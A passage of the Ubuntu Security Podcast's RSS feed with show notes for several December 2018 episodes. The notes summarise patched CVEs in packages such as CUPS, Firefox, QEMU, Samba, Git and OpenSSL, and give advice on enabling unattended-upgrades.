<li>Paper also describes an efficient cache eviction strategy</li>
<li>Linus directly applied a fix (<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=574823bfab82d9d8fa47f422778043fbb4b4f50e">https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=574823bfab82d9d8fa47f422778043fbb4b4f50e</a>)
<ul>
<li>This changes the behaviour of mincore() to only report pages which have been faulted into the cache by the calling process
<ul>
<li>So at best can now observe when a page is evicted from the cache but can&rsquo;t see when another process faults in a page</li>
</ul>
</li>
<li>Breaks user-space API of mincore() and hence some existing programs (as noted in the commit)
<ul>
<li>Linus&rsquo; primary rule is to never break userspace BUT in this case as is a security vulnerability this is okay</li>
<li>This might also likely affect other programs that use mincore in Ubuntu etc (fincore, e4defrag, qemu etc)</li>
</ul>
</li>
</ul>
</li>
<li>Fix is not in the stable upstream kernel yet as waiting to see what fallout there is and so also has not been applied to Ubuntu kernels yet</li>
<li>Also good discussion on LWN <a href="https://lwn.net/Articles/776801/">https://lwn.net/Articles/776801/</a> which highlights other avenues for inferring the contents of the page cache and other possible changes to mincore to protect against this attack</li>
<li>Will be interesting to see where this all ends up</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E017.mp3" length="20887640" type="audio/mpeg" /><itunes:duration>21:45</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 16
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-16/</link>
          <pubDate>Mon, 17 Dec 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E016.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 16</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        Last episode for 2018! This week we look at CVEs in lxml, CUPS, pixman, FreeRDP &amp; more, plus we discuss the security of home routers as evaluated by C-ITL.
        
        ]]></itunes:subtitle>
        <itunes:summary>Last episode for 2018! This week we look at CVEs in lxml, CUPS, pixman, FreeRDP &amp; more, plus we discuss the security of home routers as evaluated by C-ITL.</itunes:summary>
        <description>Last episode for 2018! This week we look at CVEs in lxml, CUPS, pixman, FreeRDP &amp; more, plus we discuss the security of home routers as evaluated by C-ITL.</description>
        <googleplay:description>Last episode for 2018! This week we look at CVEs in lxml, CUPS, pixman, FreeRDP &amp; more, plus we discuss the security of home routers as evaluated by C-ITL.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Last episode for 2018! This week we look at CVEs in lxml, CUPS, pixman, FreeRDP &amp; more, plus we discuss the security of home routers as evaluated by C-ITL.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>21 unique CVEs addressed</p>
<h3 id="usn-3841-1-usn-3841-2-lxml-vulnerability">[<a href="https://usn.ubuntu.com/3841-1/">USN-3841-1</a>, <a href="https://usn.ubuntu.com/3841-2/">USN-3841-2</a>] lxml vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19787">CVE-2018-19787</a></li>
</ul>
</li>
<li>Popular XML/HTML parser for Python</li>
<li>Tries to remove clean input document and remove links (to say embedded
javascript code) - but doesn&rsquo;t account for links containing escaped
characters - so link could persist</li>
<li>Similar to CVE-2014-3146
<ul>
<li>In this case tried to account for whitespace in links but didn&rsquo;t include
all possible whitespace characters</li>
</ul>
</li>
</ul>
<h3 id="usn-3842-1-cups-vulnerability">[<a href="https://usn.ubuntu.com/3842-1/">USN-3842-1</a>] CUPS vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-4700">CVE-2018-4700</a></li>
</ul>
</li>
<li>Session cookies used for authentication to CUPS web interface used only the
current time <strong>in seconds</strong> as a seed for the relatively predictable PRNG
<ul>
<li>Easy to bruteforce / guess</li>
<li>Fix ensures to use current time value including microseconds</li>
<li>Still using relatively predictable PRNG - should use /dev/urandom etc</li>
</ul>
</li>
</ul>
<h3 id="usn-3837-2-poppler-regression">[<a href="https://usn.ubuntu.com/3837-2/">USN-3837-2</a>] poppler regression</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19149">CVE-2018-19149</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16646">CVE-2018-16646</a></li>
</ul>
</li>
<li>Previous poppler update (Episode 15) - fix missed a previous commit and so
regressed (crash on opening certain PDF files)</li>
</ul>
<h3 id="usn-3843-1-usn-3843-2-pixman-vulnerability">[<a href="https://usn.ubuntu.com/3843-1/">USN-3843-1</a>, <a href="https://usn.ubuntu.com/3843-2/">USN-3843-2</a>] pixman vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty
<ul>
<li><a href="https://ubuntu.com/security/CVE-2015-5297">CVE-2015-5297</a></li>
</ul>
</li>
<li>Low level library for pixel manipulation (used by X, Wayland, Qemu etc)</li>
<li>Pointer overflow leading to stack-based buffer overflow in computing bounds of pixel buffers
<ul>
<li>Did include a check to see if was inside bounds, BUT didn&rsquo;t account for
possible overflow in arithmetic before the check</li>
<li>Need to check for possible overflow before doing arithmetic and comparison</li>
</ul>
</li>
</ul>
<h3 id="usn-3844-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3844-1/">USN-3844-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18497">CVE-2018-18497</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18495">CVE-2018-18495</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18498">CVE-2018-18498</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18494">CVE-2018-18494</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18493">CVE-2018-18493</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18492">CVE-2018-18492</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17466">CVE-2018-17466</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12407">CVE-2018-12407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12406">CVE-2018-12406</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12405">CVE-2018-12405</a></li>
</ul>
</li>
<li>Firefox 64 - multiple security vulnerabilities fixed
<ul>
<li>Buffer overflows, UAFs, same-origin-policy violation, webextensions able to
violate restrictions, various memory safety / corruption bugs</li>
<li><a href="https://www.mozilla.org/en-US/security/advisories/mfsa2018-29/">https://www.mozilla.org/en-US/security/advisories/mfsa2018-29/</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3845-1-freerdp-vulnerabilities">[<a href="https://usn.ubuntu.com/3845-1/">USN-3845-1</a>] FreeRDP vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-8789">CVE-2018-8789</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8788">CVE-2018-8788</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8787">CVE-2018-8787</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8786">CVE-2018-8786</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8785">CVE-2018-8785</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8784">CVE-2018-8784</a></li>
</ul>
</li>
<li>Eyal Itkin discovered multiple vulnerabilities in FreeRDP - not all affect all releases (some too old to contain affected code)</li>
<li>Various heap-based buffer overflows (crash -&gt; DoS / RCE?)</li>
<li>Out-of-bounds read (crash -&gt; DoS)</li>
</ul>
<h2 id="goings-on-in-linux-security-community">Goings on in Linux Security Community</h2>
<h3 id="linux-on-mips-and-home-routers">Linux on MIPS and home routers</h3>
<ul>
<li>Cyber-ITL (Independent Testing Lab) analysed a number of home routers for basic security hardening features
<ul>
<li>ASLR, DEP (non-executable stack), RELRO</li>
<li>Mix of MIPS and ARM devices</li>
<li>Compared against Ubuntu 16.04 LTS x86_64 (general hardening)</li>
<li>Most found to have minimal hardening features enabled</li>
<li><a href="https://cyber-itl.org/assets/papers/2018/build_safety_of_software_in_28_popular_home_routers.pdf">https://cyber-itl.org/assets/papers/2018/build_safety_of_software_in_28_popular_home_routers.pdf</a></li>
<li>Also found Linux kernel on MIPS either has executable stack (until 2016)
due to FP emulation code, or since then has no executable stack but has a
RWX segment at a fixed location, which can be used to bypass DEP / ASLR
<ul>
<li>Ubuntu does not support MIPS</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="final-episode-for-2018">Final episode for 2018</h3>
<ul>
<li>This is the last episode for 2018, on leave for the next 3 weeks</li>
<li>Next episode will be from Cape Town in 2019 during week of 14th January with some special guests&hellip; :)</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E016.mp3" length="10257266" type="audio/mpeg" /><itunes:duration>10:41</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 15
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-15/</link>
          <pubDate>Mon, 10 Dec 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E015.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 15</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Security updates for 29 CVEs including Perl, the kernel, OpenSSL (PortSmash)
  and more, plus in response to some listener questions, we discuss how to make
  sure you always have the latest security updates by using unattended-upgrades.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Security updates for 29 CVEs including Perl, the kernel, OpenSSL (PortSmash)
  and more, plus in response to some listener questions, we discuss how to make
  sure you always have the latest security updates by using unattended-upgrades.
  </itunes:summary>
        <description>  Security updates for 29 CVEs including Perl, the kernel, OpenSSL (PortSmash)
  and more, plus in response to some listener questions, we discuss how to make
  sure you always have the latest security updates by using unattended-upgrades.
  </description>
        <googleplay:description>  Security updates for 29 CVEs including Perl, the kernel, OpenSSL (PortSmash)
  and more, plus in response to some listener questions, we discuss how to make
  sure you always have the latest security updates by using unattended-upgrades.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Security updates for 29 CVEs including Perl, the kernel, OpenSSL (PortSmash)
and more, plus in response to some listener questions, we discuss how to make
sure you always have the latest security updates by using unattended-upgrades.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>29 unique CVEs addressed</p>
<h3 id="usn-3834-1-usn-3834-2-perl-vulnerabilities">[<a href="https://usn.ubuntu.com/3834-1/">USN-3834-1</a>, USN-3834-2] Perl vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18314">CVE-2018-18314</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18313">CVE-2018-18313</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18312">CVE-2018-18312</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18311">CVE-2018-18311</a></li>
</ul>
</li>
<li>Perl regex engine fuzzed with valgrind to detect memory errors
<ul>
<li>2 different heap based buffer overflow in regex engine</li>
<li>Heap-based read past end of buffer in regex engine</li>
</ul>
</li>
<li>Integer overflow from environment variables
<ul>
<li>uses untrusted input from environment variables (length of values to calculate memory to allocate)</li>
<li>heap buffer overflow</li>
</ul>
</li>
</ul>
<h3 id="usn-3835-1-usn-3836-1-usn-3836-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3835-1/">USN-3835-1</a>, <a href="https://usn.ubuntu.com/3836-1/">USN-3836-1</a>, <a href="https://usn.ubuntu.com/3836-2/">USN-3836-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>
<p>6 CVEs addressed in Cosmic, 2 in Bionic and Xenial</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6559">CVE-2018-6559</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18955">CVE-2018-18955</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18653">CVE-2018-18653</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18445">CVE-2018-18445</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18281">CVE-2018-18281</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17972">CVE-2018-17972</a></li>
</ul>
</li>
<li>
<p>Episode 14 covered CVE-2018-6559 (overlayfs / user namespace directory names disclosure)</p>
<ul>
<li>Also fixed for Bionic and Xenial</li>
</ul>
</li>
<li>
<p>Episode 12 covered CVE-2018-17972 (procfs kernel stack disclosure)</p>
</li>
<li>
<p>3 CVEs discovered by Jann Horn (and one inadvertently caused by Jann too)</p>
<ul>
<li>mremap() system call - used to expand or shrink an existing
memory mapping and possibly move it - doesn&rsquo;t properly flush TLB - could
leave pages in page cache for a short time which can then be raced to obtain
access afterwards and possible DoS crash or information disclosure etc
depending on target memory</li>
<li>Previous fix for CVE-2017-17852 (BPF verifier) discovered and also fixed by
Jann, introduced a new vulnerability which would allow BPF programs to
access memory out-of-bounds</li>
<li>Nested user namespaces with more than 5 UID or GID mappings could allow
processes with CAP_SYS_ADMIN within the namespace to access resources
outside the namespace as the kernel would get confused on which UID to
check against outside the namespace
<ul>
<li>Also fixed in Bionic and Xenial</li>
</ul>
</li>
</ul>
</li>
<li>
<p>Vulnerability specific to the Ubuntu kernel used in Cosmic (18.10)</p>
<ul>
<li>2 bugs discovered as a result of using the secure boot lockdown patchset
<ul>
<li>Module signatures not properly enforced for UEFI Secure Boot - we had
enabled the option to do this via IMA but had not then included the IMA
policy to ensure this was enforced
<ul>
<li>Fixed by turning off option to verify modules using IMA</li>
</ul>
</li>
<li>Secondary kernel keyring (ie where UEFI MOK goes from shim - used by
DKMS) not trusted - so modules signed with it wouldn&rsquo;t work (except they
do due to above)
<ul>
<li>Fixed to trust keys in secondary keyring for module signing</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
<li></li>
</ul>
<h3 id="usn-3837-1-poppler-vulnerabilities">[<a href="https://usn.ubuntu.com/3837-1/">USN-3837-1</a>] poppler vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19149">CVE-2018-19149</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19060">CVE-2018-19060</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19059">CVE-2018-19059</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19058">CVE-2018-19058</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16646">CVE-2018-16646</a></li>
</ul>
</li>
<li>NULL pointer dereference when PDF references an embedded file that does not actually exist (crash -&gt; DoS)</li>
<li>Possible infinite recursion - DoS</li>
<li>Exit on abort - DoS</li>
<li>2 for pdfdetach - CLI util to list / extract embedded files from PDFs
<ul>
<li>Out of bounds read due to fail to validate embedded files</li>
<li>NULL pointer dereference if embedded file names are invalid</li>
</ul>
</li>
</ul>
<h3 id="usn-3811-3-spamassassin-vulnerabilities">[<a href="https://usn.ubuntu.com/3811-3/">USN-3811-3</a>] SpamAssassin vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11781">CVE-2018-11781</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11780">CVE-2018-11780</a></li>
</ul>
</li>
<li>SpamAssassin was updated to latest version for Trusty, Xenial and Bionic previously (Episode 11)</li>
<li>This is the corresponding update for Precise ESM</li>
</ul>
<h3 id="usn-3838-1-libraw-vulnerabilities">[<a href="https://usn.ubuntu.com/3838-1/">USN-3838-1</a>] LibRaw vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5816">CVE-2018-5816</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5815">CVE-2018-5815</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5813">CVE-2018-5813</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5812">CVE-2018-5812</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5811">CVE-2018-5811</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5810">CVE-2018-5810</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5807">CVE-2018-5807</a></li>
</ul>
</li>
<li>Few OOB read -&gt; crash -&gt; DoS</li>
<li>NULL pointer dereference -&gt; crash -&gt; DoS</li>
<li>Integer overflow -&gt; infinite loop -&gt; DoS</li>
<li>Integer overflow -&gt; divide by zero -&gt; crash -&gt; DoS</li>
<li>Heap-based buffer overflow -&gt; crash -&gt; DoS (possible code execution?)</li>
</ul>
<h3 id="usn-3839-1-wavpack-vulnerabilities">[<a href="https://usn.ubuntu.com/3839-1/">USN-3839-1</a>] WavPack vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19841">CVE-2018-19841</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19840">CVE-2018-19840</a></li>
</ul>
</li>
<li>Infinite loop if WAV file specifies a sample rate of 0 - DoS</li>
<li>OOB read of heap allocated buffer - crash -&gt; DoS</li>
</ul>
<h3 id="usn-3840-1-openssl-vulnerabilities">[<a href="https://usn.ubuntu.com/3840-1/">USN-3840-1</a>] OpenSSL vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5407">CVE-2018-5407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0735">CVE-2018-0735</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0734">CVE-2018-0734</a></li>
</ul>
</li>
<li>PortSmash (Episode 11) - purported new Intel CPU side-channel vulnerability -
but really more an issue in OpenSSL due to needing crypto code to be both
constant time <strong>and</strong> execution flow independent of secret key</li>
<li>Timing side-channels in ECDSA and DSA signature algorithms found by Samuel Weiser
<ul>
<li>Usual thing - variations in time-to-sign can be measured by attacker to recover private signing key</li>
</ul>
</li>
</ul>
<h3 id="usn-3831-2-ghostscript-regression">[<a href="https://usn.ubuntu.com/3831-2/">USN-3831-2</a>] Ghostscript regression</h3>
<ul>
<li>Affecting Trusty, Xenial, Bionic, Cosmic</li>
<li>Latest GS updates (Episode 14) -&gt; regression
<ul>
<li>when converting PDFs via ghostscript, would crash when using FirstPage and LastPage options</li>
<li>used by imagemagick (convert) util and others</li>
<li>backported addition fix from upstream to resolve this regression</li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="feedback">Feedback</h3>
<ul>
<li>Question regarding how to ensure latest updates applied?
<ul>
<li><a href="https://help.ubuntu.com/community/AutomaticSecurityUpdates">https://help.ubuntu.com/community/AutomaticSecurityUpdates</a></li>
<li>If regularly update system (apt upgrade / software updater etc) will
already have latest security updates</li>
<li>Can make this automatic with unattended-upgrades
<ul>
<li>Is automatically installed and configured for Ubuntu 18.04 Bionic and newer to install new updates daily</li>
<li>If want to manually
<ul>
<li>sudo apt install unattended-upgrades</li>
<li>sudo dpkg-reconfigure unattended-upgrades</li>
</ul>
</li>
</ul>
</li>
<li>Canonical Livepatch Service
<ul>
<li><a href="https://www.ubuntu.com/livepatch">https://www.ubuntu.com/livepatch</a></li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E015.mp3" length="16451003" type="audio/mpeg" /><itunes:duration>17:08</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 14
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-14/</link>
          <pubDate>Mon, 03 Dec 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E014.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 14</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 32 unique CVEs addressed across the supported Ubuntu releases and talk open source software supply chain integrity and how this relates to Ubuntu compared to the recent npm event-stream compromise.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 32 unique CVEs addressed across the supported Ubuntu releases and talk open source software supply chain integrity and how this relates to Ubuntu compared to the recent npm event-stream compromise.</itunes:summary>
        <description>This week we look at some details of the 32 unique CVEs addressed across the supported Ubuntu releases and talk open source software supply chain integrity and how this relates to Ubuntu compared to the recent npm event-stream compromise.</description>
        <googleplay:description>This week we look at some details of the 32 unique CVEs addressed across the supported Ubuntu releases and talk open source software supply chain integrity and how this relates to Ubuntu compared to the recent npm event-stream compromise.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 32 unique CVEs addressed across the supported Ubuntu releases and talk open source software supply chain integrity and how this relates to Ubuntu compared to the recent npm event-stream compromise.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>32 unique CVEs addressed</p>
<h3 id="usn-3826-1-qemu-vulnerabilities">[<a href="https://usn.ubuntu.com/3826-1/">USN-3826-1</a>] QEMU vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19364">CVE-2018-19364</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18954">CVE-2018-18954</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18849">CVE-2018-18849</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17963">CVE-2018-17963</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17962">CVE-2018-17962</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17958">CVE-2018-17958</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16847">CVE-2018-16847</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12617">CVE-2018-12617</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11806">CVE-2018-11806</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10839">CVE-2018-10839</a></li>
</ul>
</li>
<li>7 medium, 3 low priority
<ul>
<li>Integer overflow in virtual network interface driver, able to be triggered
by user process in guest -&gt; crash -&gt; DoS</li>
<li>Heap based buffer overflow in SLiRP, user-based networking stack (default)
during reassembly of fragmented datagrams</li>
<li>Integer overflow when reading large blocks from files - nice PoC on github</li>
<li>NVMe emulator missing checks on read / write parameters - OOB heap buffer
r/w - guest user/process could trigger -&gt; DoS (crash) or possible arbitrary
code execution on host as qemu process</li>
<li>Integer type mismatch in rtl8139 and pcnet drivers - (from size_t to int) - unsigned
to signed - INT_MAX -&gt; -ve -&gt; OOB read - crash / DoS
<ul>
<li>Copy-pasta?</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-3827-1-usn-3827-2-samba-vulnerabilities">[<a href="https://usn.ubuntu.com/3827-1/">USN-3827-1</a>, USN-3827-2] Samba vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Precise ESM, Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16851">CVE-2018-16851</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1685">CVE-2018-1685</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16841">CVE-2018-16841</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14629">CVE-2018-14629</a></li>
</ul>
</li>
<li>CNAME records could point to themselves - infinite recursion in internal AD DNS server
<ul>
<li>Users can add CNAME records -&gt; user triggerable</li>
<li>Fix ensures CNAMEs can&rsquo;t refer to themselves</li>
</ul>
</li>
<li>If using smartcard authentication for AD, double free could occur due to mismatch in certificate vs authentication request parameters
<ul>
<li>talloc - robust against heap corruption - assert() fail - exit - DoS</li>
</ul>
</li>
<li>Null pointer dereference when reading more than 256MB of LDAP entries - DoS crash</li>
</ul>
<h3 id="usn-3828-1-webkitgtk-plus-vulnerabilities">[<a href="https://usn.ubuntu.com/3828-1/">USN-3828-1</a>] WebKitGTK+ vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-4386">CVE-2018-4386</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4372">CVE-2018-4372</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4345">CVE-2018-4345</a></li>
</ul>
</li>
<li>Minimal details provided by upstream webkit regarding these advisories:
<ul>
<li>XSS due to improper URL validation</li>
<li>Multiple memory corruption issues which could lead to arbitrary code execution</li>
</ul>
</li>
</ul>
<h3 id="usn-3816-3-systemd-regression">[<a href="https://usn.ubuntu.com/3816-3/">USN-3816-3</a>] systemd regression</h3>
<ul>
<li>3 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15687">CVE-2018-15687</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15686">CVE-2018-15686</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6954">CVE-2018-6954</a></li>
</ul>
</li>
<li>Episode 12 &amp; 13 - backport of large upstream patches to better handle symlink resolution in systemd-tmpfiles</li>
<li>New code uses openat with O_PATH flag internally</li>
<li>O_PATH was only introduced in Linux kernel 2.6.39</li>
<li>Fails on pre-2.6.39 kernels - eg. OpenVZ</li>
<li>So if running an Ubuntu Xenial kernel on OpenVZ systemd would fail to work correctly</li>
<li>OpenVZ have released updated kernel as well to support O_PATH</li>
</ul>
<h3 id="usn-3829-1-git-vulnerabilities">[<a href="https://usn.ubuntu.com/3829-1/">USN-3829-1</a>] Git vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19486">CVE-2018-19486</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-15298">CVE-2017-15298</a></li>
</ul>
</li>
<li>Previously would execute commands from CWD, rather than from PATH
<ul>
<li>Could allow arbitrary code execution if using a malicious repository</li>
</ul>
</li>
<li>DoS due to large memory usage (Git Bomb) with specially crafted repository
<ul>
<li>Small repo with only 12 unique objects inside but that which are duplicated across the repo tree</li>
<li>Git would usually crash due to running out of memory BUT if did manage to
survive and write to disk could consume a lot of disk space too</li>
<li>Only Trusty and Xenial affected (fixed already in Bionic etc)</li>
</ul>
</li>
</ul>
<h3 id="usn-3830-1-openjdk-regression">[<a href="https://usn.ubuntu.com/3830-1/">USN-3830-1</a>] OpenJDK regression</h3>
<ul>
<li>Recent OpenJDK update (Episode 10) add stricter checking for JAR files
<ul>
<li>As a result, failed to find JAR files during build resulting in failed project builds</li>
</ul>
</li>
<li>New option should have been disabled by default to give time for other packages to be updated etc to deal wth new behaviour
<ul>
<li>Is now :)</li>
</ul>
</li>
</ul>
<h3 id="usn-3831-1-ghostscript-vulnerabilities">[<a href="https://usn.ubuntu.com/3831-1/">USN-3831-1</a>] Ghostscript vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty, Xenial, Bionic, Cosmic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-19477">CVE-2018-19477</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19476">CVE-2018-19476</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19475">CVE-2018-19475</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19409">CVE-2018-19409</a></li>
</ul>
</li>
<li>Even more gs - (Episode 10, 7, 5)</li>
</ul>
